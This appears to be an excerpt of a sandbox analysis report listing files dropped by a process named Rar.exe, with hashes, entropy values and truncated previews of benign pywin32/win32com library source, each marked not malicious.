                                                                                                                                                                                                                                  SSDEEP:3:SK2h+FVjWSvn:SzIvjjv
                                                                                                                                                                                                                                  MD5:BA42EF20D93BA7415413FCD3F21EFB55
                                                                                                                                                                                                                                  SHA1:B0D0EEDAE009426C2BC525FC560FE6572416A97F
                                                                                                                                                                                                                                  SHA-256:FD88250292E1A51D97B335ECF6806D3A0C52680A941F9DE21FFB6B9E82C976EB
                                                                                                                                                                                                                                  SHA-512:5FE595FD307943BD9EC09CA78A4DC07055C0B131B5A030C900936904FE70219FD1E0614588265A42838063E5AF5C9FA9A4A4D8B7F97C48BEF8C9A52EDC72C5DC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# indicates a python package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20176
                                                                                                                                                                                                                                  Entropy (8bit):4.575209015581771
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:twHXSHGNtJKREawSP8m86dZUmhPJ9nV1oHuT42MilRQt1dK+EsfVPm6TrwEFSSMF:t8NtOEawSP8P6dZUmhCKbsfVPTkNKy/
                                                                                                                                                                                                                                  MD5:5D2E6FFF9BD431CF49C8D3275299FD80
                                                                                                                                                                                                                                  SHA1:B69B8E2B7D56919EA1D21A454A98D6A365192FB9
                                                                                                                                                                                                                                  SHA-256:C499367F47853D6A4178BFC35170EAF95CCF6623F5139F01ACC55E381FE70CC2
                                                                                                                                                                                                                                  SHA-512:19A70A1A640428152EE8A0BF4E0E5D8D4432E41517FEB59BE6F3A69C95C2B3FDF4DC631904D3D913CF237C397C24EDEC505D07EEE1C9377D094F71AB646C33FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utility functions for writing out gateway C++ files.. This module will generate a C++/Python binding for a specific COM. interface.. . At this stage, no command line interface exists. You must start Python, . import this module, change to the directory where the generated code should. be written, and run the public function.. . This module is capable of generating both 'Interfaces' (ie, Python. client side support for the interface) and 'Gateways' (ie, Python. server side support for the interface). Many COM interfaces are useful. both as Client and Server. Other interfaces, however, really only make. sense to implement one side or the other. For example, it would be pointless. for Python to implement Server side for 'IRunningObjectTable', unless we were. implementing core COM for an operating system in Python (hey - now there's an idea!). . Most COM interface code is totally boiler-plate - it consists of. converting arguments, dispatching the call to Python, a
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9847
                                                                                                                                                                                                                                  Entropy (8bit):5.399405890181776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:EcpyojruGhiAqTPQPkAqXjXhXqLXZXp2X2VXeZAXyb4tsZI:3z/uGcAuAqzRuJ5286AXyb4EI
                                                                                                                                                                                                                                  MD5:9CCF0CA7E709CD2E6B5D476F378DEF95
                                                                                                                                                                                                                                  SHA1:34A01A55208EB7B3395F3BBF2800DDBE07674BE5
                                                                                                                                                                                                                                  SHA-256:E949A4B0C3930B22EB01C0D35BA192360FEEE6EB36D27ACBBE03B8B804FC025F
                                                                                                                                                                                                                                  SHA-512:CF762EBE591CB41808A06D607C7BCB8FB084CD249634633D3D35482E9E8BEEA9C0EB27E8265E4A6B5BA424862AADF550A94F61E1031AE5821D5BA0D3C77B7FB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utility file for generating PyIEnum support...This is almost a 'template' file. It simplay contains almost full.C++ source code for PyIEnum* support, and the Python code simply.substitutes the appropriate interface name...This module is notmally not used directly - the @makegw@ module.automatically calls this..""".#.# INTERNAL FUNCTIONS.#.#.import string...def is_interface_enum(enumtype):. return not (enumtype[0] in string.uppercase and enumtype[2] in string.uppercase)...def _write_enumifc_cpp(f, interface):. enumtype = interface.name[5:]. if is_interface_enum(enumtype):. # Assume an interface.. enum_interface = "I" + enumtype[:-1]. converter = (. "PyObject *ob = PyCom_PyObjectFromIUnknown(rgVar[i], IID_%(enum_interface)s, FALSE);". % locals(). ). arraydeclare = (. "%(enum_interface)s **rgVar = new %(enum_interface)s *[celt];" % locals(). ). else:. # Enum of a simple structure. conv
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34854
                                                                                                                                                                                                                                  Entropy (8bit):4.80766491378114
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:BYm6rknUQcV8SzdUmeibJWcPC8XGqM3jZD9O18Y6OMJlj:vpqOV9OS
                                                                                                                                                                                                                                  MD5:46A0AD8E52F6DAB936F214B2CF90C61C
                                                                                                                                                                                                                                  SHA1:2F86C72EE3FFD7E5513A8985FE1D94A293BDA47F
                                                                                                                                                                                                                                  SHA-256:283844A35361A2DCE5B671A8D66DF111DF67049B3E023E22FD332A67254D7DEF
                                                                                                                                                                                                                                  SHA-512:2C0889EA767642F9240BC631B24E3E68FE5A03C0B969F1140A0555E74838ED5C69F839BE9DD644518008EC71C2C85AA0D1DE10D30ED0748B31C8F8F58896C0E0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for makegw - Parse a header file to build an interface.. This module contains the core code for parsing a header file describing a. COM interface, and building it into an "Interface" structure... Each Interface has methods, and each method has arguments... Each argument knows how to use Py_BuildValue or Py_ParseTuple to. exchange itself with Python.. . See the @win32com.makegw@ module for information in building a COM. interface.""".import re.import traceback...class error_not_found(Exception):. def __init__(self, msg="The requested item could not be found"):. super(error_not_found, self).__init__(msg)...class error_not_supported(Exception):. def __init__(self, msg="The required functionality is not supported"):. super(error_not_supported, self).__init__(msg)...VERBOSE = 0.DEBUG = 0..## NOTE : For interfaces as params to work correctly, you must.## make sure any PythonCOM extensions which expose the interface are loaded.## before generating....class Arg
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2626
                                                                                                                                                                                                                                  Entropy (8bit):4.935656889264299
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:u5riPyEAcqbTwJUek5K6FDHv7URlY3JQKh:mriPyEATbIUn5K8DP7slY3Jh
                                                                                                                                                                                                                                  MD5:68696E6FE76DE40C39CB9DCB0D0A5385
                                                                                                                                                                                                                                  SHA1:64DB43664DD46D3E0CA40D845FE4FF4C9B2E1EA3
                                                                                                                                                                                                                                  SHA-256:EC5013D1FB45A684992BAECEB53DC602F8A6CA88E90B0500D8395244B1D85AAC
                                                                                                                                                                                                                                  SHA-512:A0639C8B37FAA246D4F67B3670314694D2963474A24FC1DEF0EB87AF66F6E8A61816A18EE9319A73B8EE8B4D61B58024C7750D3D2F840F3603C91A810B5A1982
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Constants used by COM Controls.. Hand created version of OLECTL.H constants.."""..import winerror..FACILITY_CONTROL = 0xA...def MAKE_SCODE(sev, fac, code):. return int((int(-sev) << 31) | ((fac) << 16) | ((code)))...def STD_CTL_SCODE(n):. return MAKE_SCODE(winerror.SEVERITY_ERROR, FACILITY_CONTROL, n)...CTL_E_ILLEGALFUNCTIONCALL = STD_CTL_SCODE(5).CTL_E_OVERFLOW = STD_CTL_SCODE(6).CTL_E_OUTOFMEMORY = STD_CTL_SCODE(7).CTL_E_DIVISIONBYZERO = STD_CTL_SCODE(11).CTL_E_OUTOFSTRINGSPACE = STD_CTL_SCODE(14).CTL_E_OUTOFSTACKSPACE = STD_CTL_SCODE(28).CTL_E_BADFILENAMEORNUMBER = STD_CTL_SCODE(52).CTL_E_FILENOTFOUND = STD_CTL_SCODE(53).CTL_E_BADFILEMODE = STD_CTL_SCODE(54).CTL_E_FILEALREADYOPEN = STD_CTL_SCODE(55).CTL_E_DEVICEIOERROR = STD_CTL_SCODE(57).CTL_E_FILEALREADYEXISTS = STD_CTL_SCODE(58).CTL_E_BADRECORDLENGTH = STD_CTL_SCODE(59).CTL_E_DISKFULL = STD_CTL_SCODE(61).CTL_E_BADRECORDNUMBER = STD_CTL_SCODE(63).CTL_E_BADFILENAME = STD_CTL_SCODE(64).CTL_E_TOOMANYFILES = STD_CTL_SCODE(67
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3719
                                                                                                                                                                                                                                  Entropy (8bit):4.868092224015867
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:PASMD/23erRuX5WMbTA9AoOeXvOkmZM7ThZfDZ3I9aQ:P46+ITAgWmW7lZf2R
                                                                                                                                                                                                                                  MD5:9526997CC08298A2385B3AB78BC198C3
                                                                                                                                                                                                                                  SHA1:230227292D5DE2BC0D73188A010EC44A6E84BBAD
                                                                                                                                                                                                                                  SHA-256:605AF9EA17CE0A2AA2F88E9A750B5F2B6809F6A4D2C19C05ABB657650CF772F6
                                                                                                                                                                                                                                  SHA-512:2766F2D414681646281B5343DE2F035918D2C462011D3193BBF3ECC7F8DC496123545FA9D11A9337811481711470573DCFA7CF809FEF8AC63F744DE501C56B3B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang="en">.<head>. <title>win32com Readme</title>.</head>.<body>. .<p><img width="551" height="99" id="_x0000_i1025". src="html%5Cimage%5Cpycom_blowing.gif". alt="Python and COM - Blowing the others away"> </p>. .<h1>Python COM Extensions Readme </h1>. .<p>This is the readme for win32com. Please check out the <a. href="html/docindex.html">win32com documentation index</a></p>. .<p>The <a href="test/.">win32com/test directory</a> contains some interesting. scripts (and a new <a href="test/readme.txt">readme.txt</a>). Although these. are used for testing, they do show a variety of COM techniques.</p>..<h3>VARIANT objects</h3>.<p>win32com.client now has explicit VARIANT objects which can be used in.situations where you need more control over the argument types passed when.calling COM methods. See the <a href="html/variant.html">documentation on.this object</a>..<a name="currency"><h3>Important Currency changes</h3></a>.<p>.In all builds prior to 204, a COM
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                  Entropy (8bit):4.29082650068666
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SN7cF55IbMCwmF37Uuvn:SNwCwy37Uuv
                                                                                                                                                                                                                                  MD5:82A4AC7481C3360B6A75C3EC790E0B2F
                                                                                                                                                                                                                                  SHA1:43DFD78709CFC4F5120F5409A1159170007CD5DD
                                                                                                                                                                                                                                  SHA-256:5837731C114E3B7C978F01D6230282A5A85EB16B6CB085882535518C2B58A0BB
                                                                                                                                                                                                                                  SHA-512:4516B83B661F587899B7D269FB815C3D4F84037F105830EEB44F3E52461DAF2E7F05ABBA1E33B4C20CAC655E2729B3409FC90072066166646788A4D82857CDBE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Empty __init__ file to designate a sub-package..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2780
                                                                                                                                                                                                                                  Entropy (8bit):4.553893776894134
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:plZbTZ+1Xlh4ltllXlD/PDlIeXlhdXlKSXlYXlmgxDXlZlLjEEG/J1S5CJ8lXlaC:pHZElCltl9lTLlfljlKslSlmghlZlENQ
                                                                                                                                                                                                                                  MD5:396562952093B33EA5240C8BC6E0FFC8
                                                                                                                                                                                                                                  SHA1:BDB107892B56BF58C3A2993F4719786789A7627F
                                                                                                                                                                                                                                  SHA-256:9C7EC4B7878A83182038EAA856F3EA2F8C405F6FD5DF8F8CF63AA0566CFF2D8E
                                                                                                                                                                                                                                  SHA-512:879AF1EC5FEEC33B9502AF7319F56B85D101FB29F315443D2C17B92607A3A590CA7A689FB3576F30B8C8905AA3ABA75EB1A5C90910400FAD534D9DF083F157AA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for Server Side connections... A collection of helpers for server side connection points..""".import pythoncom.import win32com.server.util.import winerror.from win32com import olectl..from .exception import Exception..# Methods implemented by the interfaces..IConnectionPointContainer_methods = ["EnumConnectionPoints", "FindConnectionPoint"].IConnectionPoint_methods = [. "EnumConnections",. "Unadvise",. "Advise",. "GetConnectionPointContainer",. "GetConnectionInterface",.]...class ConnectableServer:. _public_methods_ = IConnectionPointContainer_methods + IConnectionPoint_methods. _com_interfaces_ = [. pythoncom.IID_IConnectionPoint,. pythoncom.IID_IConnectionPointContainer,. ].. # Clients must set _connect_interfaces_ = [...]. def __init__(self):. self.cookieNo = 0. self.connections = {}.. # IConnectionPoint interfaces. def EnumConnections(self):. raise Exception(winerror.E_NOTIMPL).. def GetConnecti
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9975
                                                                                                                                                                                                                                  Entropy (8bit):4.595107747090245
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4i9MMxb7wjBfGujx6rMAwOw6gjRm5OMBjfydYR5hjnf:4i99xRodJ6Lf
                                                                                                                                                                                                                                  MD5:96AD74AB698B539ED8116C23BB65DCB9
                                                                                                                                                                                                                                  SHA1:4841F432849C161B8F7D82B7FA419EA6815EB956
                                                                                                                                                                                                                                  SHA-256:9407FD5B735C360346663A5D84E214D49867A71FBC7FC8981C3295BA630C0D9F
                                                                                                                                                                                                                                  SHA-512:CBCA45D7AFDEB60590C9DBC6690BAD76B06079ACBBB3331612A735D350E4455177B92EA79CFF8E4D738CD35849B3C1B125B2B2FD1CB60BCDA4B748F42D8E67AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Dispatcher..Please see policy.py for a discussion on dispatchers and policies.""".import traceback.from sys import exc_info..import pythoncom.import win32api.import win32com..#.from win32com.server.exception import IsCOMServerException.from win32com.util import IIDToInterfaceName...class DispatcherBase:. """The base class for all Dispatchers... This dispatcher supports wrapping all operations in exception handlers,. and all the necessary delegation to the policy... This base class supports the printing of "unexpected" exceptions. Note, however,. that exactly where the output of print goes may not be useful! A derived class may. provide additional semantics for this.. """.. def __init__(self, policyClass, object):. self.policy = policyClass(object). # The logger we should dump to. If None, we should send to the. # default location (typically 'print'). self.logger = getattr(win32com, "logger", None).. # Note the "return self._H
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3496
                                                                                                                                                                                                                                  Entropy (8bit):4.582156737415511
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Y++AYcGgH1ErYMx+bwFvIZBWuDs+IS7INXN87n:Y++RcGEErYMx+bw5IZBpAtdQn
                                                                                                                                                                                                                                  MD5:2D6CEA590F0A95EA2A0DB27A216F4195
                                                                                                                                                                                                                                  SHA1:0C7EEEE558751176B574B8CD278D00B6AEC61C3A
                                                                                                                                                                                                                                  SHA-256:14F17FE2B55FDC8D3B8362F975DC24888585B9ADE97D92F458EA2BB9CDB9A38B
                                                                                                                                                                                                                                  SHA-512:0578DF531158C75AC232329773245342E0D27CA5F8E4EBC3F6C1A77E214A7BF04DC0FF1DFB78ACC1C910C351F0F04AB668F45268E30BAD3300975B3C735912CC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Exception Handling.. Exceptions... To better support COM exceptions, the framework allows for an instance to be.. raised. This instance may have a certain number of known attributes, which are.. translated into COM exception details..... This means, for example, that Python could raise a COM exception that includes details.. on a Help file and location, and a description for the user..... This module provides a class which provides the necessary attributes...""".import sys..import pythoncom...# Note that we derive from com_error, which derives from exceptions.Exception.# Also note that we dont support "self.args", as we dont support tuple-unpacking.class COMException(pythoncom.com_error):. """An Exception object that is understood by the framework... If the framework is presented with an exception of type class,. it looks for certain known attributes on this class to provide rich. error information to the caller... It should be noted that the framework supports provi
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):850
                                                                                                                                                                                                                                  Entropy (8bit):4.815862014888664
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:/QNX5gdGqRokVs8c86r5VrIgyXDe+5trM:IF5gpRoOOrjrHEDxtrM
                                                                                                                                                                                                                                  MD5:5683E97DCD5F29A47F276FA99CDF7B3D
                                                                                                                                                                                                                                  SHA1:818F22170F5F2EF06D3E9E25B116640988AC780E
                                                                                                                                                                                                                                  SHA-256:921B1941F622F5C5A5D7C6189F4886A4CF6D95771AC0908BCAC72A36CFAEF9E1
                                                                                                                                                                                                                                  SHA-512:CF477E6DDA4BB34FB1ED41D3B107EFAF43450FC3CC836910CC4F517F86A099572E44D3B23D8507337D12368C3910147948785E7AABCEC8ADFA50BFA540F2FE00
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Class factory utilities..import pythoncom...def RegisterClassFactories(clsids, flags=None, clsctx=None):. """Given a list of CLSID, create and register class factories... Returns a list, which should be passed to RevokeClassFactories. """. if flags is None:. flags = pythoncom.REGCLS_MULTIPLEUSE | pythoncom.REGCLS_SUSPENDED. if clsctx is None:. clsctx = pythoncom.CLSCTX_LOCAL_SERVER. ret = []. for clsid in clsids:. # Some server append '-Embedding' etc. if clsid[0] not in ["-", "/"]:. factory = pythoncom.MakePyFactory(clsid). regId = pythoncom.CoRegisterClassObject(clsid, factory, clsctx, flags). ret.append((factory, regId)). return ret...def RevokeClassFactories(infos):. for factory, revokeId in infos:. pythoncom.CoRevokeClassObject(revokeId).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1194
                                                                                                                                                                                                                                  Entropy (8bit):4.976463880953823
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:qEDDboYs/8GX9lwQGZLTqtxU8R76HPMX5h48yaaI12pFu2aBpNC:6ZXzwNZCtGU76vW5h/H2pFuri
                                                                                                                                                                                                                                  MD5:01E7B6FDA3635ABB6DAEEE50CDEED9F7
                                                                                                                                                                                                                                  SHA1:E41B28638F8A3EECB8D55F89EF9EA02A724CCED1
                                                                                                                                                                                                                                  SHA-256:EA66C96F055172DE3900929BF21D25CF9A97B207D5009AAF164BB6E7F6BAD10E
                                                                                                                                                                                                                                  SHA-512:62E01CAF0ADC3DF9CCCD45AE56A653B1DCAF5C8767BFDB8C81199DFBB8DAA83B19A78AC0F20D8D88B82CE947E2125DADDADDF46E8F83858A4A94736F4EEC9780
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# LocalServer .EXE support for Python..#.# This is designed to be used as a _script_ file by pythonw.exe.#.# In some cases, you could also use Python.exe, which will create.# a console window useful for debugging..#.# NOTE: When NOT running in any sort of debugging mode,.# 'print' statements may fail, as sys.stdout is not valid!!!..#.# Usage:.# wpython.exe LocalServer.py clsid [, clsid].import sys..sys.coinit_flags = 2.import pythoncom.import win32api.from win32com.server import factory..usage = """\.Invalid command line arguments..This program provides LocalServer COM support.for Python COM objects...It is typically run automatically by COM, passing as arguments.The ProgID or CLSID of the Python Server(s) to be hosted."""...def serve(clsids):. infos = factory.RegisterClassFactories(clsids).. pythoncom.EnableQuitMessage(win32api.GetCurrentThreadId()). pythoncom.CoResumeClassObjects().. pythoncom.PumpMessages().. factory.RevokeClassFactories(infos).. pythoncom.CoUnini
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33141
                                                                                                                                                                                                                                  Entropy (8bit):4.593543235743787
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:J5/q7N12KNQZlYN0wyC+NIW59VEERVLdrW0o2nBiUtv4xVCiDc:J5/qpkKulI+jW0o+vv4/o
                                                                                                                                                                                                                                  MD5:639A66364D8B6CA5B7E57BCAA86107CD
                                                                                                                                                                                                                                  SHA1:0961CA6A02895FEA1DB40C5B4EE82EE8EE90075F
                                                                                                                                                                                                                                  SHA-256:9978C536B37B9F73512A91D0E3FC99F55D1FED91FAFCB17AFA68E9F2BC5744E9
                                                                                                                                                                                                                                  SHA-512:E72F03CECD540C6006DA8CEFA4896709FB2F13AFD5CC9C492511725939974D6D21E7C9E74B0C7386DDE08114D24E05ABD72F166B5DF8C3EBE367CAD021AD820D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Policies ..Note that Dispatchers are now implemented in "dispatcher.py", but.are still documented here...Policies.. A policy is an object which manages the interaction between a public . Python object, and COM . In simple terms, the policy object is the . object which is actually called by COM, and it invokes the requested . method, fetches/sets the requested property, etc. See the . @win32com.server.policy.CreateInstance@ method for a description of. how a policy is specified or created... Exactly how a policy determines which underlying object method/property . is obtained is up to the policy. A few policies are provided, but you . can build your own. See each policy class for a description of how it . implements its policy... There is a policy that allows the object to specify exactly which . methods and properties will be exposed. There is also a policy that . will dynamically expose all Python methods and properties - even those . added after the object has been instantiat
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25076
                                                                                                                                                                                                                                  Entropy (8bit):4.659547425005804
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:7NT/CaIamuUGpr4ou56hqhmVyVqaxu+HgDFXwx/D9kkUkPl:7NT/GGpK5iqkVyV/xDupw9D9GkPl
                                                                                                                                                                                                                                  MD5:DC199C2F6BB9103A9D81A4FA4E90DF3D
                                                                                                                                                                                                                                  SHA1:B9741C7736A308334AEFE4AE425E298E99494AAE
                                                                                                                                                                                                                                  SHA-256:8D20A25015E4BC54CBFEEC727BFFD53D864D44FCB884C6B03BE6BEA247744AF5
                                                                                                                                                                                                                                  SHA-512:33328D661889C48B2767C400C31013402DED7D57B5C8F1FAA17C3BFF7EA2EA7024DFF0D1DFAEF6A124AB9FAA5A342805B880219BF6EA597A48C58A2221DB43F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for registering objects...This module contains utility functions to register Python objects as.valid COM Servers. The RegisterServer function provides all information.necessary to allow the COM framework to respond to a request for a COM object,.construct the necessary Python object, and dispatch COM events...""".import os.import sys..import pythoncom.import win32api.import win32con.import winerror..CATID_PythonCOMServer = "{B3EF80D0-68E2-11D0-A689-00C04FD658FF}"...def _set_subkeys(keyName, valueDict, base=win32con.HKEY_CLASSES_ROOT):. hkey = win32api.RegCreateKey(base, keyName). try:. for key, value in valueDict.items():. win32api.RegSetValueEx(hkey, key, None, win32con.REG_SZ, value). finally:. win32api.RegCloseKey(hkey)...def _set_string(path, value, base=win32con.HKEY_CLASSES_ROOT):. "Set a string value in the registry.".. win32api.RegSetValue(base, path, win32con.REG_SZ, value)...def _get_string(path, base=win32con.HKEY_CLASSES
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6702
                                                                                                                                                                                                                                  Entropy (8bit):4.682014380050602
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zbQehv+u6tEWC62LI2nTprmqQZuJqYHN6VNYxA7wd:HB+t46MI2lrmqQZuJqYHGNefd
                                                                                                                                                                                                                                  MD5:15D42CC3F4D36665BC50CEE6B3231E75
                                                                                                                                                                                                                                  SHA1:E5615F3EB48FEBAA76B1E7B7B274C202BD76D324
                                                                                                                                                                                                                                  SHA-256:0D8E925E710539EAFCCA76510034C2A046AA0F35B1CF557E7C5FE40A9BFE72BE
                                                                                                                                                                                                                                  SHA-512:658CE11A42C81C6BEB8B67CA016D590A99E6B858970C6B577BA2E464607CC621A7EA5F8FC9C00EDA0446C89C0D6281B346B3700A71EFD86F5E5C0127AB90BE61
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" General Server side utilities .""".import pythoncom.import winerror..from . import policy.from .exception import COMException...def wrap(ob, iid=None, usePolicy=None, useDispatcher=None):. """Wraps an object in a PyGDispatch gateway... Returns a client side PyI{iid} interface... Interface and gateway support must exist for the specified IID, as. the QueryInterface() method is used... """. if usePolicy is None:. usePolicy = policy.DefaultPolicy. if useDispatcher == 1: # True will also work here.. import win32com.server.dispatcher.. useDispatcher = win32com.server.dispatcher.DefaultDebugDispatcher. if useDispatcher is None or useDispatcher == 0:. ob = usePolicy(ob). else:. ob = useDispatcher(usePolicy, ob).. # get a PyIDispatch, which interfaces to PyGDispatch. ob = pythoncom.WrapObject(ob). if iid is not None:. ob = ob.QueryInterface(iid) # Ask the PyIDispatch if it supports it?. return ob...def unwra
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1178
                                                                                                                                                                                                                                  Entropy (8bit):4.426483796070394
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kG788TbzrcW/r7FZybFrKwipwBX4C77F3ugx9/HCZLG/h6eTerrNiXZM/2X6H/a+:kG788fzrcWD7FAbFrkOh4qTxi1k6e6Hj
                                                                                                                                                                                                                                  MD5:B06CC9A0DBAB570B5DB41637E1AD6573
                                                                                                                                                                                                                                  SHA1:81FADB18B9198660C1498BE715131A482310C0DB
                                                                                                                                                                                                                                  SHA-256:114DE154A15223D1AAD50FCCFF02493C796BF367F09E18130C8F2DD39BEBCA1B
                                                                                                                                                                                                                                  SHA-512:CB149B96E16445EEE13CAA1618FB4A0A07AB0D79A9DF317CDC0DDB649D593389E1F5682FA973FDAEB415F7277E1527CB23C4051A6D244BB60DC3E376ABF6CFDF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys.import time...class Tools:. _public_methods_ = ["reload", "adddir", "echo", "sleep"].. def reload(self, module):. if module in sys.modules:. from importlib import reload.. reload(sys.modules[module]). return "reload succeeded.". return "no reload performed.".. def adddir(self, dir):. if type(dir) == type(""):. sys.path.append(dir). return str(sys.path).. def echo(self, arg):. return repr(arg).. def sleep(self, t):. time.sleep(t)...if __name__ == "__main__":. from win32com.server.register import RegisterServer, UnregisterServer.. clsid = "{06ce7630-1d81-11d0-ae37-c2fa70000000}". progid = "Python.Tools". verprogid = "Python.Tools.1". if "--unregister" in sys.argv:. print("Unregistering..."). UnregisterServer(clsid, progid, verprogid). print("Unregistered OK"). else:. print("Registering COM server..."). RegisterServer(.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4463
                                                                                                                                                                                                                                  Entropy (8bit):4.745656083351947
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Nce3k70ArkQThivNM1/vNMpU81BALecPRvHrl04rOpFCnlN/w:NcG+d4u13u+LRpCFCnlhw
                                                                                                                                                                                                                                  MD5:EB469879CD0B5D622321D44327FF67C7
                                                                                                                                                                                                                                  SHA1:EC40C6F0114B449480B576CDE088235946C70372
                                                                                                                                                                                                                                  SHA-256:F3A6EC518C93D52BEF1AEB589EA369008A8072F959F85341BAF8D4BE2CE45F29
                                                                                                                                                                                                                                  SHA-512:D94BD462CA97223AEE52EF14DBBCD78835D588F5B1959169DE8E013990E408DD4FB0A0A30DE0A13585676D7B726D34B2F9E32157C50F87CFE08D4CE551F0A85D
                                                                                                                                                                                                                                  Malicious:false
